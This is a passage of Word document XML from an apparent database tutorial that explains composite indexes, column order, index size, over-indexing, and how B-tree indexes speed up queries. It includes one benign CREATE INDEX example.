        </w:rPr>
        <w:t>Multi-Column Searches</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B7128" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When your application frequently queries based on multiple columns, a composite index can be more efficient than creating separate indexes on each column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B70FEFF" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sorting and Grouping</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F352F4" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Composite indexes can also improve the performance of queries that involve sorting (ORDER BY) or grouping (GROUP BY) on multiple columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C23E12" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Considerations When Using Composite Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD413CD" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Column Order Matters</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42088274" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The order of columns in the index is crucial. The database can only efficiently use the composite index if the query filters or sorts based on the leading columns of the index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B817408" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Index Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104D3339" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Composite indexes can become large, especially if they include many columns or large columns. This can increase storage requirements and potentially slow down write operations (e.g., INSERT, UPDATE, DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB2BCCA" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Over-Indexing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70017C3A" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>It’s possible to over-index a table, which can lead to diminishing returns. Each index consumes additional disk space and requires maintenance during write operations. Careful planning is required to ensure that the benefits outweigh the costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0407BE2D" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381776A0" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772EAD64" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Suppose you have a table orders with columns customer_id, order_date, and status. If your application frequently queries the table to find all orders for a customer on a specific date with a specific status, you can create a composite index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8870EE" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96"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CREATE INDEX idx_orders ON orders (customer_id, order_date, status);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736112BB" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Partial Index Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E187994" w14:textId="77777777" w:rsidR="00541E96" w:rsidRPr="00DA2F32" w:rsidRDefault="00541E96" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="411"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If a query filters by customer_id and order_date, the composite index can still be used, even though it doesn’t include status. However, if the query only filters by status, the composite index won’t be as effective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA160AD" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1945ECA1" w14:textId="2006B706" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc178383312"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How does an index improve query performance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w14:paraId="5C64AF68" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>An index improves query performance by allowing the database to quickly locate and retrieve the data without scanning the entire table. Indexes are data structures (typically a B-tree or hash table) that store a sorted subset of the table’s columns, enabling faster searches, sorting, and filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA1AD3" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How an Index Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3D5AA" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When a query is executed, the database engine can either perform a full table scan (checking every row) or use an index to jump directly to the relevant rows. Using an index is much faster than a full table scan because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B89966" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data Access Path</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E1B234" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Without an index, the database must read every row in the table to find the matching data. This is known as a full table scan and can be very slow, especially in large tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277E27B2" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>With an index, the database can quickly locate the starting point of the relevant data and read only the necessary rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC590FD" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sorted Data Structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5802AB" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexes typically store data in a sorted order. For example, if you have an index on a column called last_name, the database can efficiently retrieve rows where last_name is within a specific range or matches a particular value because the data is already sorted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6B1BE9" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This sorted structure allows for faster lookups using algorithms like binary search, significantly reducing the number of comparisons needed to find the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A7F8E" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Benefits of Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499C301E" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Faster Search Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EEDE52" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexes provide a more direct path to the data. For instance, searching for a specific value in an indexed column is much quicker because the index allows the database to bypass irrelevant rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D3A715" w14:textId="77777777" w:rsidR="00A30E54" w:rsidRPr="00DA2F32" w:rsidRDefault="00A30E54" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
